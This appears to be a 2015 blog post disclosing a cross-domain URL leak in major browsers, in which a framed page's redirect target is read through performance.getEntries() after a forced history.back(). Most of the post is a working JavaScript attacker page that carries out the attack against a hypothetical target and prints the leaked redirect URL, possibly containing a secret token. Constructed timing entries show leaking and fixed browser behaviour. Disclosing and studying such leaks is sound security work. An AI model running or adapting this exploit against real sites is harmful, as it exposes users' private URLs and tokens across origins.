PoC steal URL x-domain

18 jul 2015 by cgvwzq

It is possible to read a cross-domain URL after a redirect using performance.getEntries(), provided the target page can be framed.

The issue affects ALL current browsers (Chrome, Firefox and IE). Update: for specific Firefox and Chrome versions, see the linked follow-up.

Steps:

  1. The target page (1) is loaded in our iframe
  2. A performance entry for (1) is created
  3. The page follows its redirect to (2); a cross-domain page is not supposed to learn the frame's current URL
  4. We navigate the frame to an arbitrary URL and then force a history.back()
  5. The frame loads (2) from cache and a new performance entry is created
  6. This time the entry carries the redirect target (2) instead of the original URL (1)

It takes a few seconds, but the delay can be reduced.
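The six steps above as an attacker page, written here as an added example and not the original PoC code. The URLs are hypothetical: (1) is assumed to be http://target.example/token_redirect.php, which answers with an HTTP redirect to a URL (2) carrying a token, and the decoy page used in step 4 lives on the attacker's origin. The entry-inspection logic is kept separate from the browser driver so it can be exercised on constructed Resource Timing entries; the two fixture lists at the bottom are made up to show what an affected browser and a correct browser would report, not captured output.

```javascript
// Added example, not the original PoC: attacker-page logic for the six steps
// above. Every URL here is hypothetical; the target (1) is assumed to answer
// with an HTTP redirect to a URL (2) that carries a secret token.
const TARGET_URL = 'http://target.example/token_redirect.php';   // (1), hypothetical
const DECOY_URL  = 'http://attacker.example/blank.html';          // step 4, hypothetical
const STEP_DELAY_MS = 2000; // the post says a few seconds are needed; tune down while it still works

// Pure helper: newest Resource Timing entry produced by an <iframe> after
// `afterTime` (DOMHighResTimeStamp, same clock as performance.now()).
// Returns the entry's name (its URL) or null if there is none.
function newestIframeEntryAfter(entries, afterTime) {
  let newest = null;
  for (const e of entries) {
    if (e.initiatorType !== 'iframe' || e.startTime <= afterTime) continue;
    if (newest === null || e.startTime > newest.startTime) newest = e;
  }
  return newest ? newest.name : null;
}

// Pure helper for step 6. On a correct browser the entry created after
// history.back() is still named (1); on an affected browser it is named (2),
// which is exactly the cross-domain URL we are not supposed to see.
function leakedRedirect(originalUrl, entryAfterBack) {
  if (entryAfterBack === null || entryAfterBack === originalUrl) return null;
  return entryAfterBack;
}

// Browser driver for steps 1-5. Resolves with the leaked URL (2), or null.
function runPoC(win) {
  return new Promise(resolve => {
    const frame = win.document.createElement('iframe');
    frame.onload = () => {
      frame.onload = null;           // steps 1-3 done: (1) loaded and redirected to (2)
      frame.src = DECOY_URL;         // step 4a: move the frame somewhere else
      win.setTimeout(() => {
        const t0 = win.performance.now();
        win.history.back();          // step 4b: frame goes back to (2), served from cache
        win.setTimeout(() => {       // step 5: by now a new entry exists for the frame
          const after = newestIframeEntryAfter(win.performance.getEntries(), t0);
          resolve(leakedRedirect(TARGET_URL, after));
        }, STEP_DELAY_MS);
      }, STEP_DELAY_MS);
    };
    frame.src = TARGET_URL;          // step 1
    win.document.body.appendChild(frame);
  });
}

// Constructed entry lists (not captured from a real browser) showing both outcomes.
const ENTRIES_AFFECTED = [
  { name: TARGET_URL, initiatorType: 'iframe', startTime: 100 },   // step 2: named (1)
  { name: DECOY_URL,  initiatorType: 'iframe', startTime: 2100 },  // step 4a
  { name: 'http://target.example/landing.php?token=s3cr3t',
    initiatorType: 'iframe', startTime: 4200 },                    // step 5: named (2), the leak
];
const ENTRIES_FIXED = [
  { name: TARGET_URL, initiatorType: 'iframe', startTime: 100 },
  { name: DECOY_URL,  initiatorType: 'iframe', startTime: 2100 },
  { name: TARGET_URL, initiatorType: 'iframe', startTime: 4200 },  // still named (1): no leak
];
const T0 = 4100; // performance.now() taken just before history.back()

function demoAffected() {
  return leakedRedirect(TARGET_URL, newestIframeEntryAfter(ENTRIES_AFFECTED, T0));
}
function demoFixed() {
  return leakedRedirect(TARGET_URL, newestIframeEntryAfter(ENTRIES_FIXED, T0));
}

if (typeof window !== 'undefined') {
  runPoC(window).then(url => console.log('Page ' + TARGET_URL + ' redirected to ' + url));
} else {
  console.log('affected browser:', demoAffected(), '| fixed browser:', demoFixed());
}
```

Loaded in a browser, runPoC() drives the real iframe; under Node only the fixture path runs. The check in leakedRedirect is deliberately just "name differs from (1)": Resource Timing is supposed to name a cross-origin resource by the URL that was requested, so any other name coming out of the back navigation is the redirect target.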


Page http://demo.vwzq.net/php/token_redirect.php redirected to ....